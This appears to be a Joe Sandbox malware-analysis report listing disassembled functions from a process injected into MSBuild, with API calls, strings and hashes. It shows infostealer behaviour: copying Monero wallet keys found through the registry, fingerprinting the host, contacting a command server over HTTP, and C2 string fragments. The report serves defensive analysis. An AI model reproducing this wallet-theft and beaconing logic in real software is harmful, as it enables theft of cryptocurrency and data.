Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpy$strtok_s
String ID: anA$false$true
API String ID: 2610293679-3558530194
Opcode ID: 6a3afd5e8b88b6cacb1060a73ffdb1b54b6c9d623c2142e9b7e0b6247605779e
Instruction ID: 28ec9be6b1e855a5d5ad00fa29704b442616d7bac6571d6649f76a51c6d16edf
Opcode Fuzzy Hash: 6a3afd5e8b88b6cacb1060a73ffdb1b54b6c9d623c2142e9b7e0b6247605779e
Instruction Fuzzy Hash: B1A1B7B2D00204ABDB24EBB1DC45DEE777DEF54304F00456EF51AA6142EB78A6C9CB94

Function 00410730 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 171memorycomtimeCOMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000030,00000000,00000000,?,Windows: ,00000000,?,00423684,00000000,?,Work Dir: In memory,00000000), ref: 00410758
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000030,00000000,00000000,?,Windows: ,00000000), ref: 00410769
CoCreateInstance.OLE32(004249C0,00000000,00000001,004248F0,00000000,?,00000030,00000000,00000000,?,Windows: ,00000000,?,00423684,00000000,?), ref: 00410783
CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000030,00000000,00000000,?,Windows: ,00000000,?), ref: 004107BC
VariantInit.OLEAUT32(?), ref: 0041081B

Part of subcall function 00410630: CoCreateInstance.OLE32(00424770,00000000,00000001,004238C4,00410847,00000000,00000000,00000030,00410847,00000030,?,00000001,?,00000030,00000000,00000000), ref: 0041066D
Part of subcall function 00410630: SysAllocString.OLEAUT32(?), ref: 0041067B
Part of subcall function 00410630: _wtoi64.MSVCRT ref: 004106BA
Part of subcall function 00410630: SysFreeString.OLEAUT32(?), ref: 004106D9
Part of subcall function 00410630: SysFreeString.OLEAUT32(00000000), ref: 004106E0

FileTimeToSystemTime.KERNEL32(?,00000000,?,?,00000030,00000000,00000000,?,Windows: ,00000000,?,00423684,00000000,?,Work Dir: In memory,00000000), ref: 00410852
GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000030,00000000,00000000,?,Windows: ,00000000,?,00423684,00000000,?,Work Dir: In memory,00000000), ref: 0041085E
HeapAlloc.KERNEL32(00000000,?,?,00000030,00000000,00000000,?,Windows: ,00000000,?,00423684,00000000,?,Work Dir: In memory,00000000,?), ref: 00410865
VariantClear.OLEAUT32(?), ref: 004108A9
wsprintfA.USER32 ref: 00410891

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

Strings

InstallDate, xrefs: 0041082D
Select * From Win32_OperatingSystem, xrefs: 004107D1
Unknown, xrefs: 004108CC
WQL, xrefs: 004107D6
ROOT\CIMV2, xrefs: 0041079B
%d/%d/%d %d:%d:%d, xrefs: 0041088B

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileInitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$WQL
API String ID: 1611285705-271508173
Opcode ID: 09b10624150b565fb9ee4139e1e133b027331012701015932dd590229877180f
Instruction ID: f60bae9c613f7fa121a8b30a4fe63b67029c37922dcc64605f50a105dcd30c53
Opcode Fuzzy Hash: 09b10624150b565fb9ee4139e1e133b027331012701015932dd590229877180f
Instruction Fuzzy Hash: 4B515071A01228BBCB24DB95DC45EEFBBBCEF49B10F104116F515A7280D7799A41CBE4

Function 00401A30 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 180registrymemorystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00401A48
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00401A5E
HeapAlloc.KERNEL32(00000000), ref: 00401A65
RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00416D8D), ref: 00401A82
RegQueryValueExA.ADVAPI32(00416D8D,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401A9C

Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878

Part of subcall function 004142A0: Sleep.KERNEL32(000003E8,?,=OA,?,?,00000000), ref: 00414345
Part of subcall function 004142A0: CreateThread.KERNEL32(00000000,00000000,004130F0,?,00000000,00000000), ref: 0041438D
Part of subcall function 004142A0: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00414399

RegCloseKey.ADVAPI32(00416D8D), ref: 00401AA6
lstrcatA.KERNEL32(?,00000000), ref: 00401AB4
lstrlenA.KERNEL32(?), ref: 00401AC1
lstrcatA.KERNEL32(?,.keys), ref: 00401ADC
CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401BC6
DeleteFileA.KERNEL32(00000000), ref: 00401C32

Strings

wallet_path, xrefs: 00401A96
.keys, xrefs: 00401AD0
SOFTWARE\monero-project\monero-core, xrefs: 00401A76
\Monero\wallet.keys, xrefs: 00401AF4

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: FileHeaplstrcat$AllocCloseCopyCreateDeleteObjectOpenProcessQuerySingleSleepThreadValueWaitlstrcpylstrlenmemset
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 709784044-218353709
Opcode ID: 6c78f9737e0f4eb0430da094aef2da056fb3a29fe2d1524e8419046d69aa5cf9
Instruction ID: f1d60a6bbfd1a10beadc68d07a737e3e9b1c6f7b3b4a17850d8004e5f304ac36
Opcode Fuzzy Hash: 6c78f9737e0f4eb0430da094aef2da056fb3a29fe2d1524e8419046d69aa5cf9
Instruction Fuzzy Hash: CF513E72910108ABDB14FBA1DD56EEE737DAF54304F50803EF506724D2EB786A08CBA9

Function 0040FFC0 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 180registrystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

RegOpenKeyExA.KERNEL32(00000000,00E56B78,00000000,00020019,00000000,004201E9), ref: 00410009
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410052
wsprintfA.USER32 ref: 0041007C
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0041009A
RegQueryValueExA.KERNEL32(00000000,00E5A2C0,00000000,000F003F,?,00000400), ref: 004100CA
lstrlenA.KERNEL32(?), ref: 004100DF
RegQueryValueExA.KERNEL32(00000000,00E5A2A8,00000000,000F003F,?,00000400,00000000,?,?,00000000,80000002,00423408), ref: 00410156

Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878

Strings

?, xrefs: 0040FFFB
xk, xrefs: 0040FFD7, 00410062
%s\%s, xrefs: 00410076
- , xrefs: 00410160

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: OpenQueryValuelstrcpy$Enumlstrlenwsprintf
String ID: - $%s\%s$?$xk
API String ID: 1989970852-2765303643
Opcode ID: 8a58cbb879ff4631560fe32f29b8c87e8684d69af0c42c52604faec2b0e2a397
Instruction ID: 86116914c5d038b2623fcf9dac74439a401e9ecf48d0cd90823b8e99bbc113d5
Opcode Fuzzy Hash: 8a58cbb879ff4631560fe32f29b8c87e8684d69af0c42c52604faec2b0e2a397
Instruction Fuzzy Hash: 47613EB2900109AFDB14EB91DC95FEFB77DEF44704F00816AF605A3590EB786A49CBA4

Function 004139E0 Relevance: 25.1, APIs: 11, Strings: 3, Instructions: 633sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0040F8A0: lstrlenA.KERNEL32(004176BE,?,00000000,?,00416587,004201E9,004201E9,?,00000000,?,?,004176BE), ref: 0040F8AB
Part of subcall function 0040F8A0: lstrcpyA.KERNEL32(00000000,004176BE), ref: 0040F8E2

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413B47
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413BAA
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413CF3

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878

Part of subcall function 00412EE0: StrCmpCA.SHLWAPI(00000000,ERROR,?,?,?,?,?,?,?,?,?,?,?,?,?,00413AD4), ref: 00412F20

Part of subcall function 00412FA0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00412FFA
Part of subcall function 00412FA0: lstrlenA.KERNEL32(00000000), ref: 00413011
Part of subcall function 00412FA0: StrStrA.SHLWAPI(00000000,00000000), ref: 00413039
Part of subcall function 00412FA0: lstrlenA.KERNEL32(00000000), ref: 0041304E
Part of subcall function 00412FA0: lstrlenA.KERNEL32(00000000), ref: 0041306B

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413C90
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413DD9
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413E3C
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413F22
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413F85
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041406B
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004140C8
Sleep.KERNEL32(0000EA60), ref: 004140D7

Strings

ERROR, xrefs: 00413B39, 00413B9C, 00413C82, 00413CE5, 00413DCB, 00413E2E, 00413F14, 00413F77, 0041405D, 004140BA
9jA, xrefs: 00413B08, 00414284, 004140BF, 00413ABD, 00413C51, 00413CB4, 00413D9A, 00413DFD, 00413EE3, 00413F46, 0041402C, 0041408F, 00413FE1, 00413E98, 00413D4F, 00413C06, 00413B6B, 00413AC2, 00413B0D, 00413B70, 00413C0B, 00413C56, 00413CB9, 00413D54, 00413D9F, 00413E02, 00413E9D, 00413EE8, 00413F4B, 00413FE6, 00414031, 00414094
9jA, xrefs: 004141C4, 004141D9, 004141E1, 004141F6, 00414190, 004141A5, 004141AD, 0041415C, 00414171, 00414179, 00414125, 0041413A, 00414142, 004140EE, 00414103, 0041410B, 0041409A, 004140B2, 0041409D, 004140F1, 0041410E, 00414128, 00414145, 0041415F, 0041417C, 00414193, 004141B0, 004141C7, 004141E4

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleep
String ID: 9jA$9jA$ERROR
API String ID: 507064821-3453893218
Opcode ID: 0ea8e545eb3128f4f77ed40ce8583ede3be02ffdb08c09b4d87bab1d85280d1e
Instruction ID: cf25ed66686d9262e125a475b4914be09e4212f98396e3805e3bfcd737600e71
Opcode Fuzzy Hash: 0ea8e545eb3128f4f77ed40ce8583ede3be02ffdb08c09b4d87bab1d85280d1e
Instruction Fuzzy Hash: B82220729102086ACB24FB72DD57ADE773C6F14348F50857EB80672496EF3C674C8A69

Function 004043E0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 176networkmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878

Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DA2
Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DAF
Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DBC
Part of subcall function 00403D70: lstrlenA.KERNEL32(00000000,00000000,0000003C,00000000,?,00000030), ref: 00403DD6
Part of subcall function 00403D70: InternetCrackUrlA.WININET(00000000,00000000), ref: 00403DE6

GetProcessHeap.KERNEL32(00000000,05F5E0FF,?,?,?,?,?,?,00000030), ref: 0040441C
RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,?,00000030), ref: 00404423
InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404442
StrCmpCA.SHLWAPI(?,00E59ED8,?,?,?,?,?,?,00000030), ref: 0040445A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404482
HttpOpenRequestA.WININET(00000000,GET,?,00E5ADC8,00000000,00000000,-00400100,00000000), ref: 004044BC
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004044E0
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004044EF
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040450E
InternetReadFile.WININET(00000000,?,00000400,00000001), ref: 00404566
InternetCloseHandle.WININET(00000000), ref: 00404597
InternetCloseHandle.WININET(00000000), ref: 004045A4
InternetCloseHandle.WININET(00000000), ref: 004045AB

Strings

GET, xrefs: 004044B6

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
String ID: GET
API String ID: 442264750-1805413626
Opcode ID: 73b93f037f3d0394893e843639a95aae659a3d0ad89ccdea9a3f8b6d82784bb0
Instruction ID: db9b65f6ff3aa58b69ab7c80ee4b507d2baca41c59675a027e4a866d6253625d
Opcode Fuzzy Hash: 73b93f037f3d0394893e843639a95aae659a3d0ad89ccdea9a3f8b6d82784bb0
Instruction Fuzzy Hash: FC5165B1A00219BBDB20DBA5DD45FAF77B9EB88701F005129FB05B72C1D7749E058BA4

Function 00410420 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 124memorystringCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0041043C
GetVolumeInformationA.KERNEL32({kA,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410475
GetProcessHeap.KERNEL32(00000000,00000104), ref: 004104BF
HeapAlloc.KERNEL32(00000000), ref: 004104C6
wsprintfA.USER32 ref: 004104F9
lstrcatA.KERNEL32(00000000,004238B4), ref: 00410508
GetCurrentHwProfileA.ADVAPI32(?), ref: 00410515
lstrlenA.KERNEL32(00000000,Unknown), ref: 0041053E
lstrcatA.KERNEL32(00000000,00000000), ref: 00410568

Strings

{kA, xrefs: 00410464, 00410467
Unknown, xrefs: 00410528
C, xrefs: 00410446
{kA:\, xrefs: 0041057F, 004104D2

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Heaplstrcat$AllocCurrentDirectoryInformationProcessProfileVolumeWindowslstrlenwsprintf
String ID: C$Unknown${kA${kA:\
API String ID: 3099411152-4130650692
Opcode ID: b74412bfd4cb5e005043bdfec85b093bd968682a5cb06f4c1c2fb100bc783f89
Instruction ID: 2c5738cd0ea039ca6d181a749ddccaa7ec64b74ae76ae9b2a1b3dd877f563171
Opcode Fuzzy Hash: b74412bfd4cb5e005043bdfec85b093bd968682a5cb06f4c1c2fb100bc783f89
Instruction Fuzzy Hash: 38419171A00218ABDB10EBA4DC46FEE777CEF44705F144169F605B7181EBB85A44CBEA

Function 00416510 Relevance: 20.5, APIs: 4, Strings: 7, Instructions: 1232networksleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

Part of subcall function 0040F8A0: lstrlenA.KERNEL32(004176BE,?,00000000,?,00416587,004201E9,004201E9,?,00000000,?,?,004176BE), ref: 0040F8AB
Part of subcall function 0040F8A0: lstrcpyA.KERNEL32(00000000,004176BE), ref: 0040F8E2

Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,00E4EEA8,?,00423414,?,00000000,004201E9), ref: 0040F9B9
Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

Part of subcall function 00411400: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411439
Part of subcall function 00411400: Process32First.KERNEL32(00000000,00000128), ref: 00411449
Part of subcall function 00411400: Process32Next.KERNEL32(00000000,00000128), ref: 0041145B
Part of subcall function 00411400: StrCmpCA.SHLWAPI(?,00423EE4), ref: 00411470
Part of subcall function 00411400: FindCloseChangeNotification.KERNEL32(00000000), ref: 00411482

CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00E593C8,00000000,?,004201E9,00000000,004176BE), ref: 00416A16
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00416B22
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00416B3C

Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878

Part of subcall function 00410420: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0041043C
Part of subcall function 00410420: GetVolumeInformationA.KERNEL32({kA,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410475
Part of subcall function 00410420: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004104BF
Part of subcall function 00410420: HeapAlloc.KERNEL32(00000000), ref: 004104C6

Part of subcall function 00403E20: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00403EAC
Part of subcall function 00403E20: StrCmpCA.SHLWAPI(?,00E59ED8,?,?,?,?,?,?,00000030), ref: 00403EC7

Part of subcall function 004123F0: StrCmpCA.SHLWAPI(00000000,block,?,00416B9A), ref: 0041240D
Part of subcall function 004123F0: ExitProcess.KERNEL32 ref: 00412418

Part of subcall function 0040E870: StrCmpCA.SHLWAPI(00000000,00E59E38), ref: 0040E8C0
Part of subcall function 0040E870: StrCmpCA.SHLWAPI(00000000,00E59D28), ref: 0040E947

Part of subcall function 00405BB0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405C3C
Part of subcall function 00405BB0: StrCmpCA.SHLWAPI(?,00E59ED8,?,?,?,?,?,?,00000030), ref: 00405C57

Part of subcall function 00411F00: strtok_s.MSVCRT ref: 00411F24

Sleep.KERNEL32(000003E8), ref: 00416F45

Part of subcall function 00415D00: lstrcatA.KERNEL32(?,00E5A140,?,00000104,?,00000104,?,00000104,?,00000104), ref: 00415D5B
Part of subcall function 00415D00: lstrcatA.KERNEL32(?,00000000), ref: 00415D7E
Part of subcall function 00415D00: lstrcatA.KERNEL32(?,?), ref: 00415D9A
Part of subcall function 00415D00: lstrcatA.KERNEL32(?,?), ref: 00415DAE
Part of subcall function 00415D00: lstrcatA.KERNEL32(?,00E5AA78), ref: 00415DC1
Part of subcall function 00415D00: lstrcatA.KERNEL32(?,?), ref: 00415DD5
Part of subcall function 00415D00: lstrcatA.KERNEL32(?,00E59470), ref: 00415DE9

Part of subcall function 004045D0: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000030), ref: 00404641
Part of subcall function 004045D0: StrCmpCA.SHLWAPI(?,00E59ED8,004201E9,004201E9,004201E9,004201E9), ref: 004046A6
Part of subcall function 004045D0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004046CC

Strings

_DEBUG.zip, xrefs: 004173F9
http://, xrefs: 004172F8
dabl, xrefs: 0041733C
org, xrefs: 004173C4
.exe, xrefs: 0041693D, 00417293
arp, xrefs: 0041731A
zapto, xrefs: 00417380

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

